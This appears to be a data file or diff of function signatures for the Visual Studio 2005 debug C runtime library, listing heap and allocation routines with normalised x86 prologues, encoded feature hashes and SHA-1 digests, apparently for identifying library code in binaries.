+__realloc_dbg,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32",d/QmEQAAAAAAAAAA,mzkZby8CckKbORlv/B+Cu00oA0nVNKmYmzkZby8CckKcsCpSnLAqUuRSvJ87j6vlqNTrXSQDw50AAAAApwLOW00oA0nVNKmYO4+r5eRSvJ8AAAAA5FK8n5ywKlIvAnJCLwJyQuRSvJ/b6hIU1TSpmE0oA0kAAAAA2+oSFORSvJ87j6vlTSgDSZyGUTgAAAAAnIZROORSvJ+chlE4O4+r5eRSvJ8AAAAA2+oSFORSvJ87j6vlnIZRONvqEhSDrkNelfRtypyGUTiWc/Bfg65DXuRSvJ/b6hIU2+oSFORSvJ87j6vllnPwX5yGUTgAAAAAnIZROC0l+mrXsJf317CX99vqEhQp2auw7xfqrZyGUThF3/zBO4+r5eRSvJ8AAAAA5FK8n5yGUTiDrkNeKdmrsORSvJ/b6hIUg65DXsuCy5WchlE42+oSFORSvJ87j6vlnIZROIOuQ17LgsuVRd/8wcSg0gkAAAAA5FK8ny8CckKV9G3Ky4LLlcSg0gkAAAAAg65DXuZSh8Cj21lWo9tZVinZq7AAAAAAO4+r5eRSvJ8AAAAA5FK8n9ewl/deo4MnnIZROBgu/kqchlE4XqODJ5yGUTgAAAAAnIZROBgu/krJm/A9LSX6arVETSSbORlv5lKHwORSvJ/b6hIUyZvwPcSg0gkAAAAA2+oSFORSvJ91gwavmzkZb7VETSSWc/BfGC7+Sm6ffVpSaOpblnPwX7VETSQAAAAAtURNJORSvJ/b6hIUUmjqW+RSvJ/b6hIUdYMGr+ZSh8AOKm0t5FK8n+ZSh8AOKm0t2+oSFORSvJ91gwavDiptLSnZq7AAAAAAKdmrsOZSh8AG7SXyBu0l8iQDw50AAAAAdYMGr1Jo6ltun31a5FK8n1Jo6ltun31a5lKHwORSvJ/b6hIUbp99WgTg13WRkn0FO4+r5eRSvJ8AAAAA5FK8n7VETSSchlE42+oSFORSvJ91gwavnIZROBPkPcAT5D3AE+Q9wF6jgydmeTE1kZJ9BZyGUTichlE4BODXdZyGUTichlE4dYMGr+ZSh8Co1Otd5FK8n+ZSh8Co1OtdZnkxNcSg0gkAAAAAXqODJ1XQLjgAAAAAE+Q9wFXQLjhmeTE1JAPDnQuoqqrsLj7fnIZROJywKlIH94Jg7C4+36KL7u0AAAAAB/eCYORSvJ87j6vlC6iqqsSg0gkAAAAAZnkxNcSg0gkAAAAAoovu7cSg0gkAAAAAVdAuOFLl+aIh+sPBO4+r5eRSvJ8AAAAA5FK8nwf3gmBeo4MnXqODJ2Z5MTUAAAAAnLAqUuRSvJ87j6vlIfrDwVLl+aK+CP3fxKDSCQAAAAAAAAAAUuX5oqcCzlv8H4K7O4+r5eRSvJ8AAAAA5FK8n5ywKlJmeTE1ZnkxNcSg0gkAAAAAnIZROJyGUTi/z9qYv8/amORSvJ87j6vlvgj936cCzlv8H4K7O4+r5eRSvJ8AAAAA5FK8n7/P2phmeTE1ZnkxNcSg0gkAAAAAnIZROC8CckKbORlv,769ebe98c51a849b0a1994a74c35983d3cb60136,VS2005,LIBCD.LIB
+__CrtSetDbgFlag,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR DS:[0]\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],-1\nJCC CONST",dyISrtUc1LarnOA5q5zgOQAAAAAAAAAA1RzUtgAAAAAAAAAA,[],93bb94c0cfe468e7ea337b98296bd7ddbfce6f3e,VS2005,LIBCD.LIB
+__CrtMemDumpAllObjectsSince,"PUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32",wOuxk+RSvJ91gwavdYMGr/6AfCr+Ikd85FK8n/6AfCr+Ikd8lZe2SDUWchMAAAAA/iJHfDUWchMAAAAALSX6ainZq7DsCHcnnLAqUuRSvJ91gwavpEX0gzUWchMIPn2udYMGr5ywKlLEoNIJ5FK8n5ywKlLEoNIJ5FK8nwg+fa4kA8OdKdmrsN/GRXhPG/0s7Ah3JynZq7A1FnITxKDSCQAAAAAAAAAAJAPDnZWXtkj8xWYUdYMGr9uwS8TfxkV45FK8n9uwS8TfxkV45FK8n9/GRXheo4Mn38ZFeORSvJ91gwavCD59ruRSvJ91gwavNRZyEzUWchMAAAAAdYMGr5ywKlKchlE45FK8n5ywKlKchlE4nIZROHac/ZoqH7L/Txv9LNuwS8TfxkV4Kh+y/2nNBgAAAAAAdYMGrwg+fa4AAAAAdpz9mmnNBgAAAAAACD59ruRSvJ91gwavdYMGr9/GRXikRfSD5FK8n9/GRXikRfSDNRZyEzUWchMAAAAAZ0XQ+5ywKlJ25RRm38ZFeORSvJ91gwavpEX0gynZq7AIPn2uKdmrsKRF9IP+gHwqac0GAJywKlJ25RRm/oB8KuRSvJ91gwavduUUZpywKlKkRfSD5FK8nwg+fa4AAAAAdYMGrwg+fa4kA8OdpEX0gzUWchNtG5LqdYMGr9/GRXheo4Mn/MVmFDUWchMAAAAANRZyE2dF0PsAAAAAXqODJ9/GRXgAAAAAnLAqUuRSvJ91gwav27BLxORSvJ91gwavbRuS6jUWchMtJfpq,[],1d2a5d901262348698d0dceba541a9a4f48c8086,VS2005,LIBCD.LIB
+_free,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPOP EBP",FGPB2wAAAAAAAAAA,LSX6auRSvJ8p2auw2+oSFORSvJ91gwavnLAqUuRSvJ91gwav5FK8n1Jo6luchlE4g65DXmuESWOj21lW+Lev7HWOR2+DrkNeKdmrsORSvJ8tJfpqnIZROOx2hrvo82hTo9tZVinZq7AAAAAAG1YSKeRSvJ91gwavLSX6auRSvJ8p2auw2+oSFORSvJ91gwavG1YSKeRSvJ91gwavBu0l8o2jQ8gAAAAAxKDSCQAAAAAAAAAAKdmrsOx2hruchlE4a4RJY+RSvJ/b6hIUdYMGr2uESWOcHwLW5FK8n2uESWOcHwLWdYMGrxtWEikp2auwy2nEJZyGUThSaOpbKdmrsORSvJ/b6hIUnB8C1sSg0gkAAAAAKdmrsCnZq7DXsJf32+oSFORSvJ91gwavNRZyE8Sg0gkAAAAA2+oSFORSvJ91gwavdYMGr5ywKlI1FnIT5FK8n5ywKlI1FnITjaNDyMSg0gkAAAAA7HaGu+RSvJ/b6hIUNRZyE8Sg0gkAAAAALwJyQuRSvJ/b6hIUdYMGrxtWEilL9W5D5FK8nxtWEilL9W5DKdmrsORSvJ/b6hIU2+oSFORSvJ91gwavS/VuQynZq7AbVhIp2+oSFORSvJ91gwavdYMGr2uESWOufKZi5FK8n2uESWOufKZidYMGry0l+mrtZaly5FK8ny0l+mrtZaly2+oSFORSvJ91gwav17CX99vqEhQp2auwrnymYmuESWMG7SXy7WWpcinZq7ChQTcrdYMGr1Jo6luchlE4KdmrsGuESWMG7SXydYMGr+x2hrv4t6/sdY5Hb8Sg0gkAAAAA5FK8n+x2hrv4t6/sUmjqW+RSvJ/b6hIUoUE3K0v1bkMbVhIpnIZROCptFEE1FnITdYMGr9ewl/fmFrL86PNoU+RSvJ/b6hIUdYMGry8CckJ9uuuO5FK8ny8CckJ9uuuO5hay/MSg0gkAAAAAKm0UQS8CckKcsCpSfbrrjuRSvJ8p2auw5FK8n9ewl/fmFrL8a4RJY+RSvJ/b6hIU5FK8nxtWEikp2auw,13b93e1e7b6fb0b45b62e84d9b9404661d8950f8,VS2005,LIBCD.LIB
+__calloc_dbg,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nIMUL R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32",c/3vE9Uc1LZCO7Zr1RzUtgAAAAAAAAAADTmJ14OuQ14AAAAAQju2a4OuQ14AAAAAg65DXtUc1LYNOYnX,[],846c0c9c533ffa17d4008f893539ef9b25d4470f,VS2005,LIBCD.LIB
+_malloc,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR DS:[0]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",JV/M1wAAAAAAAAAA,DczAAU+LzAoAAAAALtQI0t7g538AAAAA3uDnf6A3OqGchlE4nIZROC8CckKgNzqhT4vMCgAAAAAAAAAAoDc6oU+LzAoAAAAALwJyQl6jgycNzMABXqODJ97g538AAAAA,d807b876a86d7faf1b454c7feb4befe16fc84462,VS2005,LIBCD.LIB
+__heap_alloc,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST",JozPjQAAAAAAAAAA,v8/amORSvJ87j6vlUmjqW+RSvJ/b6hIUO4+r5eRSvJ8AAAAA2+oSFORSvJ91gwavO4+r5eRSvJ8AAAAAXqODJ2Z5MTUAAAAAZnkxNcSg0gkAAAAA5FK8nwf3gmBeo4MnJKZop8Sg0gkAAAAAVdAuONT0dkG4zICf5FK8n7/P2phmeTE1nIZROJywKlIH94JgZnkxNcSg0gkAAAAAqvDFugHYv5P5MfyLZnkxNcSg0gkAAAAAElkXhoeHZR+chlE4dYMGr1Jo6ltun31a5FK8n1Jo6ltun31aJAPDnQHYv5P5MfyLuMyAnySmaKcAAAAAbp99WhL8uF72Z/GknIZROIeHZR+bORlvO4+r5eRSvJ8AAAAA+TH8i9q7ynsAAAAAmzkZb4eHZR+chlE45FK8n5ywKlJmeTE1x8uPJRJZF4a/z9qYnLAqUuRSvJ87j6vlB/eCYORSvJ87j6vlAdi/k8Sg0gkAAAAA9mfxpJs5GW+chlE4Evy4Xps5GW+chlE4mzkZb5yGUTjsCHcn2rvKe8Sg0gkAAAAAnLAqUuRSvJ87j6vlnIZROIeHZR+csCpS7Ah3J5yGUTiWc/BflnPwX5yGUTgAAAAAbdNvlm6ffVpSaOpbnIZROL/P2pjHy48lO4+r5eRSvJ8AAAAA5FK8n5ywKlKHh2UfxKDSCQAAAAAAAAAAh4dlH1XQLjhmeTE11PR2QSQDw52q8MW6,34396450faf80558c6a2e10660257bea51d2bf98,VS2005,LIBCD.LIB
+__free_dbg,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",y2nEJZyGUThSaOpb5FK8nxtWEikp2auwnB8C1sSg0gkAAAAAKdmrsCnZq7DXsJf32+oSFORSvJ91gwav6PNoU+RSvJ/b6hIUO4+r5eRSvJ8AAAAA5FK8n5ywKlI1FnITjaNDyMSg0gkAAAAA7HaGu+RSvJ/b6hIU+Lev7HWOR2+DrkNeO4+r5eRSvJ8AAAAAdYMGrxtWEilL9W5DLwJyQuRSvJ/b6hIUnIZROOx2hrvo82hT5FK8nxtWEilL9W5DKdmrsORSvJ/b6hIU2+oSFORSvJ91gwavS/VuQynZq7AbVhIp2+oSFORSvJ91gwavdYMGr2uESWOufKZi5FK8n2uESWOufKZi2+oSFORSvJ87j6vlO4+r5eRSvJ8AAAAA5FK8ny0l+mrtZalyKdmrsORSvJ/b6hIUrnymYmuESWMG7SXyG1YSKeRSvJ91gwav7WWpcinZq7ChQTcrNRZyE8Sg0gkAAAAAKdmrsGuESWMG7SXy2+oSFORSvJ87j6vldY5Hb8Sg0gkAAAAA5FK8n+x2hrv4t6/sUmjqW+RSvJ/b6hIUoUE3K0v1bkMbVhIpnIZROCptFEE1FnITdYMGr9ewl/fmFrL85FK8n9ewl/fmFrL8O4+r5eRSvJ8AAAAA5FK8ny8CckI+yobZ5hay/MSg0gkAAAAAKm0UQS8CckKcsCpSPsqG2S0l+moAAAAAa4RJY+RSvJ/b6hIULSX6auRSvJ8p2auw17CX99vqEhQp2auw2+oSFORSvJ91gwavg65DXmuESWOj21lWxKDSCQAAAAAAAAAAKdmrsORSvJ8tJfpqdYMGr+x2hrv4t6/s2+oSFORSvJ87j6vlo9tZVinZq7AAAAAAnLAqUuRSvJ87j6vlG1YSKeRSvJ91gwav5FK8n1Jo6luchlE4LSX6auRSvJ8p2auwNRZyE8Sg0gkAAAAABu0l8o2jQ8gAAAAAKdmrsOx2hruchlE4a4RJY+RSvJ/b6hIUdYMGr2uESWOcHwLW5FK8n2uESWOcHwLWdYMGrxtWEikp2auw,[],a51bd319da1f78c94c8960365a3d8b8b01f55e40,VS2005,LIBCD.LIB
+__heap_alloc_dbg,"PUSH CONST\nXOR R32,R32\nMOV R8,BYTE PTR DS:[0]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nPUSH R32\nCALL CONST",Adi/k8Sg0gkAAAAA9mfxpJs5GW+chlE4Evy4Xps5GW+chlE4mzkZb5yGUTjsCHcn2rvKe8Sg0gkAAAAAO4+r5eRSvJ8AAAAAnLAqUuRSvJ91gwav7Ah3J5yGUTiWc/BfxKDSCQAAAAAAAAAAlnPwX5yGUTgAAAAAbdNvlm6ffVpSaOpbnIZROIeHZR+csCpSnIZROL/P2pjHy48ldYMGr5ywKlKHh2Uf5FK8n5ywKlKHh2Ufx8uPJRJZF4a/z9qYdYMGr1Jo6ltun31ah4dlH1XQLjhmeTE11PR2QSQDw52q8MW6v8/amORSvJ87j6vlUmjqW+RSvJ/b6hIU2+oSFORSvJ91gwavZnkxNcSg0gkAAAAAdYMGr5ywKlJmeTE1XqODJ2Z5MTUAAAAAJKZop8Sg0gkAAAAAVdAuONT0dkG4zICf5FK8n7/P2phmeTE1nLAqUuRSvJ91gwavB/eCYORSvJ91gwavZnkxNcSg0gkAAAAAqvDFugHYv5P5MfyLdYMGrwf3gmBeo4MnElkXhoeHZR+chlE45FK8nwf3gmBeo4Mn5FK8n1Jo6ltun31aJAPDnQHYv5P5MfyLuMyAnySmaKcAAAAAbp99WhL8uF72Z/GknIZROJywKlIH94JgnIZROIeHZR+bORlv+TH8i9q7ynsAAAAAmzkZb4eHZR+chlE45FK8n5ywKlJmeTE1ZnkxNcSg0gkAAAAA,[],14f71f5874decff2d8230cd74fc087b15a4a72d5,VS2005,LIBCD.LIB
+__mbsnicoll,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",VaatKFXMwQkNzMABl3FRnk+LzAoAAAAADczAAU+LzAoAAAAA2jcg2k+LzAoAAAAAVczBCdo3INqXcVGeT4vMCgAAAAAAAAAA,[],2d0ad12689f79d3f2c2c9617b61929b502880c37,VS2005,LIBCD.LIB
+__ismbcgraph,"MOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32*2+CONST]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",mdT0gGs/0wRmeTE1Umd/BpZz8F8e0JUBlnPwX6A3OqEAAAAAaz/TBFJnfwYNzMAB9CnuCEFF0BsAAAAASsDrlhLljK+Z1PSAHtCVAZZz8F/0Ke4IZnkxNU+LzAoAAAAAoDc6oU+LzAoAAAAAJElloJZz8F/0Ke4IlnPwX0FF0BsAAAAADczAAU+LzAoAAAAAEuWMr5Zz8F8kSWWg9CnuCKA3OqEAAAAAQUXQG0+LzAoAAAAAT4vMCgAAAAAAAAAA,[],b0595881b35f28b20e7474205af980cafe7a30d7,VS2005,LIBCD.LIB
+___sbh_heap_init,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR DS:[0]\nPUSH R32\nCALL DWORD PTR DS:[0]\nMOV DWORD PTR DS:[0],R32",15gZqZozYAENzMABmjNgAQDh1msAAAAADczAAQDh1msAAAAAAOHWawAAAAAAAAAA,[],09c267deda477f17a8d8b1095d1d6b9bd16104b7,VS2005,LIBCD.LIB
+___sbh_alloc_block,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nMOV R32,DWORD PTR DS:[0]\nIMUL R32,R32,CONST\nMOV R32,DWORD PTR DS:[0]\nADD R32,R32",lnPwX+W+SNkAAAAAnIZROB3ACbSFtzAs0rElJZyGUTgAAAAA5b5I2YXWQX7IUl/XhbcwLJyGUTgAAAAAtPxfs3blFGb/kzGLuvizfGMzqC/uiKz+RNPv5XblFGb/kzGLyFJf1+6IrP4AAAAAZnkxNS+iRdUAAAAAyFJf1+W+SNkAAAAAXqODJxvD+8YAAAAA5oBZbhroYeRmeTE1G8P7xhroYeSDrkNeHcAJtHblFGbfkElbsKeINZyGUTjQlNzKeF2amOaAWW5meTE1g65DXoOuQ14p2auwnIZRONAHUQPQB1ED0/hh+br4s3zTASa90AdRA7tjVi7UpXwO/5Mxi8hSX9deo4MnhdZBfpyGUTjSsSUlZnkxNS+iRdUAAAAAXqODJ4OuQ14AAAAAo4CtnZyGUTjQlNzKyFJf14OuQ14AAAAAGuhh5JZz8F/lvkjZURslMETT7+Uw0I/E7ois/mMzqC/uiKz+7ois/u6IrP4p2auw35BJW5yGUTgmQTxvg65DXuaAWW6UfyzVqTAGp7r4s3zTASa9XqODJ3blFGYAAAAAyFJf14OuQ14AAAAAduUUZpyGUTgmQTxvXqODJ6OArZ0AAAAA7ois/mMzqC8V5jTxcgcWeqOArZ2wp4g10AdRA6kwBqfT+GH51KV8DpyGUTgAAAAAlH8s1e6IrP4p2auwg65DXnblFGb/kzGLduUUZhroYeSUfyzVJkE8b6OArZ2chlE4FeY08QAAAAAAAAAAKdmrsMhSX9deo4MnWdRQsV6jgycAAAAA7ois/hvD+8b/kzGLlH8s1RvD+8b/kzGL0JTcypyGUTichlE4YzOoLwAAAAAAAAAAu2NWLpyGUTgAAAAA5b5I2YXWQX6Wc/BfnIZROHIHFnpZ1FCxyFJf1+6IrP4AAAAAKdmrsMhSX9deo4MnnIZROLr4s3zTASa9L6JF1QAAAAAAAAAAXqODJ+6IrP4AAAAA/5Mxi8hSX9deo4Mn0wEmvWMzqC/uiKz+7ois/uaAWW54XZqYMNCPxLT8X7MAAAAA,[],c7b28b2ea358ebf504d5a414372fb1e6a823ef18,VS2005,LIBCD.LIB
+___sbh_heapmin,"MOV R32,DWORD PTR DS:[0]\nSHL R32,CONST\nMOV R32,DWORD PTR DS:[0]\nMOV R32,DWORD PTR DS:[R32+CONST]\nADD R32,R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nPUSH CONST\nPUSH CONST",S9M70AAAAAAAAAAAT4vMCgAAAAAAAAAAHXRXIUzmFGKTWr+eTOYUYqx4s7UkA8Odk1q/nqx4s7UkA8OdJAPDnax4s7VL0zvQh1hVuE+LzAoddFchrHiztQAAAAAAAAAA,[],c4fc3ee00d3561c4f2f0ed2e22e5352916afbe84,VS2005,LIBCD.LIB
+___sbh_free_block,"MOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSAR R32,CONST\nSUB R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],CONST",duUUZn5lmyzQlNzKnIZROHIHFnpZ1FCxfivRSwAAAAAAAAAAHs7ZdEFx6+l+K9FLWdRQsV6jgycAAAAAlnPwX/vevnQAAAAA0JTcyn5lmyychlE4QXHr6QAAAAAAAAAA+96+dA6V6Uz8MVlQu2NWLn5lmywAAAAAXqODJxMVyEUAAAAARr3HcQAAAAAAAAAAJkE8bxMVyEWchlE4fmWbLE+LzArRSJSl/DFZUPwxWVAMG6dNJkE8bzI6UlychlE41DGd5xMVyEUAAAAAT4vMCgAAAAAAAAAAnIZROHIHFnpZ1FCxg93ibAPNSt47DOWnWdRQsV6jgycAAAAADBunTXblFGbfkElb/DFZUHblFGbfkElb1DGd5zI6UlwAAAAA0UiUpUa9x3EddFchcgcWehMVyEXUMZ3nMjpSXA6V6UwAAAAAnIZROIPd4myD3eJsHXRXIbmtQ1pmEeimZ+edkyZBPG9/ewDsOwzlpwPNSt4AAAAAg93ibLtjVi7D694g35BJW/h3+cEmQTxvEug6fGfnnZNn552TZhHopka9x3Eeztl0duUUZvh3+cEmQTxvXqODJzI6UlwAAAAAcgcWejI6UlzUMZ3nf3sA7BMVyEWchlE4+Hf5wQ6V6UwAAAAAExXIRfvevnSWc/BfA81K3n5lmywAAAAADpXpTNCU3Mp25RRmua1DWka9x3Eeztl0Z+edk/vevnSWc/Bfw+veILtjVi4AAAAA,[],c1e2e1336d5c053bb68a7155d9f9a4d90a8b8c2f,VS2005,LIBCD.LIB
+___sbh_alloc_new_group,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSHL R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nADD R32,R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nPUSH CONST\nPUSH CONST",+Pb6+YOuQ14AAAAAZfuETNjjmyw1OUYqNTlGKtjjmywAAAAAnIZROAxAKHqFtzAsnIZROFjgL2TlnGVK1mXLYpyGUTgAAAAAhbcwLJyGUTgAAAAAWOAvZPj2+vmvJ1dc5ZxlSj7KhtkAAAAAT4vMCgAAAAAAAAAATeCekGX7hEzuzv2h2OObLE+LzAoAAAAArydXXE+LzAoAAAAA7s79oU3gnpAAAAAAg65DXmX7hEzuzv2hPsqG2ZyGUTgAAAAADEAoepyGUTgAAAAA,[],73a414c1c3d75e179d5989fa324ee039f2aba50d,VS2005,LIBCD.LIB
+___sbh_heap_check,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32]\nSAR R32,CONST\nSUB R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],CONST\nJCC CONST",QZy2oYsNFEwAAAAA/MSgqk+LzAoAAAAAl3FRnk+LzAoAAAAAo1gjzCkn9ZgAAAAA/MSgqk+LzAoAAAAAFoi8/Q5C2wgAAAAAVyQ31D7KhtkAAAAAzR/HmdFiQLP8xKCqnIZROMjnoB5xORksiw0UTNFiQLOchlE4cTkZLNFiQLMAAAAA0pbwN2nNBgAAAAAAPsqG2WnNBgAAAAAA/MSgqk+LzAoAAAAADkLbCH5GQ3QAAAAAaoBtWMFGPMf8xKCqac0GAMOfOH1cR1vCtgmCjybu4WXXXck5/MSgqk+LzAoAAAAAac0GAMOfOH2srGBn5/HKlo+z4Ir8xKCqNgQPvg7f5JAAAAAAJtogdo+z4IpqgG1YayCKy0GctqH8xKCqXEdbwlaV7VP8xKCq0WJAsyopR5X8xKCqrKxgZ2Cfrl0AAAAAvvCIivzEoKoqkazWKSf1mCbu4WXXXck5zdxLdZQlpJgAAAAA5/HKltFiQLP8xKCqPsqG2WnNBgAAAAAAnrLoxZdxUZ44TG61j7Pgivhsf+RrIIrLlCWkmIsNFEwAAAAA/MSgqk+LzAoAAAAA/MSgqk+LzAoAAAAA/MSgqk+LzAoAAAAAac0GAJ6y6MV4Uljb113JORNIkN/8xKCq/MSgqk+LzAoAAAAAYJ+uXYsNFEw4VJChZVfZBfzEoKrn8cqWDkLbCIsNFEwAAAAAKilHlT7KhtkAAAAAOExutSopR5WXcVGeVpXtU35GQ3QAAAAAeFJY24sNFEwAAAAA0WJAs5b6hKP8xKCq/MSgqk+LzAoAAAAA/MSgqk+LzAoAAAAADt/kkA7f5JAO3+SQXqODJw7f5JAAAAAAwUY8xw5C2wgAAAAA/MSgqk+LzAoAAAAAiw0UTPzEoKq+8IiKl3FRnk+LzAoAAAAAw584fZdxUZ5CBkuzDt/kkJcYw5heo4MngFJ/0qNYI8yvJ1dclxjDmA7f5JAAAAAAKilHlbYJgo8AAAAAViKMqefxypbN3Et1OFSQoYsNFExqgG1Y6yrURjYED778xKCqlvqEo2Cfrl0AAAAArydXXE+LzAoAAAAA/MSgqk+LzAoAAAAA+Gx/5JQlpJjN3Et1fkZDdIk5b/ZlV9kFKpGs1qhbI3T8xKCqQgZLs1ckN9SXcVGeE0iQ32nNBgAAAAAAiTlv9tKW8Df8xKCqJu7hZU+LzAoAAAAAT4vMCgAAAAAAAAAAyOegHtFiQLMAAAAAaoBtWPzEoKrrKtRGDt/kkFYijKn8xKCqzdxLdefxypYAAAAA0WJAs/zEoKrNH8eZqFsjdCbaIHb8xKCq/MSgqk+LzAoAAAAAiw0UTGnNBgAWiLz9/MSgqk+LzAoAAAAA,[],6f05eaa373a1812cf2b1a2847049c96c793744cc,VS2005,LIBCD.LIB
+__get_sbh_threshold,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR DS:[0]\nPOP EBP\nRETN",YAM74QAAAAAAAAAA,[],6e458b0ca597f920bfca5c36b00650c66ccface6,VS2005,LIBCD.LIB
+___sbh_verify_block,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,DWORD PTR DS:[R32+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",Umd/BuB4J1T0Ke4IiajahOB4J1QOlelM9CnuCNUc1LYAAAAA4HgnVAAAAAAAAAAADpXpTOB4J1RSZ38G1RzUtgAAAAAAAAAA,[],477844284cf8d49404431ea9db4c4b717a8a12a8,VS2005,LIBCD.LIB
+___sbh_resize_block,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nAND R8,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",JkE8bxMVyEWchlE4XqODJ0z0EcgAAAAAcgcWekz0EcjUMZ3nw+veILtjVi4AAAAAA81K3mr+HvEAAAAAduUUZiqzQt7tDuGCJkE8b0z0EcichlE4OwzlpwPNSt4AAAAAnIZROHIHFnpZ1FCxg93ibLtjVi7D694g7Q7hgvvevnT/W1Cc1XLjo16jgycAAAAAWdRQsV6jgycAAAAAf3sA7Ez0EcichlE4ZbTiAGr+HvGchlE4nIZROHIHFnpZ1FCx0JTcymr+HvGchlE4/DFZUNCU3MqWc/BfWdRQsV6jgyfVcuOju2NWLmr+HvEAAAAAA81K3mr+HvEAAAAAav4e8SqzQt4AAAAAwxwIbmfnnZNmeTE10JTcymr+HvGchlE4lnPwX9CU3MoAAAAAKrNC3k+LzAoAAAAACUDTPdCU3MpltOIAT4vMCgAAAAAAAAAA0AdRAwPNSt6XnJjMu2NWLmr+HvEAAAAA/1tQnNCU3Mpn552Tav4e8SeUYX4AAAAADpXpTGZ5MTXDHAhu+96+dNCU3Mpn552T1DGd50z0EcgAAAAAw+veILtjVi4AAAAAExXIRdCU3MpltOIANyfHjHblFGYOlelMZ+edkyZBPG9/ewDsnIZROIPd4myD3eJsJ5RhfiqzQt4AAAAAnIZRONAHUQPQB1EDl5yYzGr+HvEAAAAAZnkxNU+LzAoAAAAAg93ibAPNSt47DOWnTPQRyCeUYX78MVlQ0AdRA7tjVi7D694gZ+edkyZBPG9/ewDsXqODJxMVyEUAAAAAcgcWehMVyEUJQNM9f3sA7BMVyEWchlE4,[],d709279515502152b239f0f21cf91ff1445077c1,VS2005,LIBCD.LIB
+___sbh_alloc_new_region,"MOV R32,DWORD PTR DS:[0]\nIMUL R32,R32,CONST\nMOV R32,DWORD PTR DS:[0]\nADD R32,R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR DS:[0]",T4vMCgAAAAAAAAAAdWHtU+2FEWZmeTE1DczAAU+LzAoAAAAAYdA/9k+LzAoAAAAAeBaaYmHQP/bTWPp001j6dE+LzAoAAAAAYLfLzngWmmINzMABZnkxNU+LzAoAAAAARMIU9mC3y851Ye1T7YURZngWmmINzMAB,[],1af91d0cde131b0496b4a9c0c83a1bc10d9a827f,VS2005,LIBCD.LIB
+___sbh_find_block,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR DS:[0]\nIMUL R32,R32,CONST\nMOV R32,DWORD PTR DS:[0]\nADD R32,R32\nMOV DWORD PTR SS:[EBP+CONST],R32",oDc6oU+LzAoAAAAA6yB0oybu4WUYa2g/g65DXibu4WUYa2g/yFJf14OuQ14AAAAAGGtoP8hSX9egNzqhJu7hZU+LzAoAAAAAT4vMCgAAAAAAAAAA,[],3b3421ede61061a94d3a9f1f7436cc4a8731029c,VS2005,LIBCD.LIB
+__set_sbh_threshold,"PUSH EBP\nMOV EBP,ESP\nCMP DWORD PTR SS:[EBP+CONST],CONST\nJCC CONST",DczAAQDh1msAAAAA/b4V1wDh1msAAAAAAOHWawAAAAAAAAAAlmZ05f2+FdcNzMAB,[],03e32f41ec7cd2b2774c83021d6ecc7848dbca5d,VS2005,LIBCD.LIB
+__getdrives,"PUSH EBP\nMOV EBP,ESP\nCALL DWORD PTR DS:[0]\nPOP EBP\nRETN",JQZ0sQAAAAAAAAAA,[],7121ee3147c65982419ca5463b049c0d84c4bf1c,VS2005,LIBCD.LIB
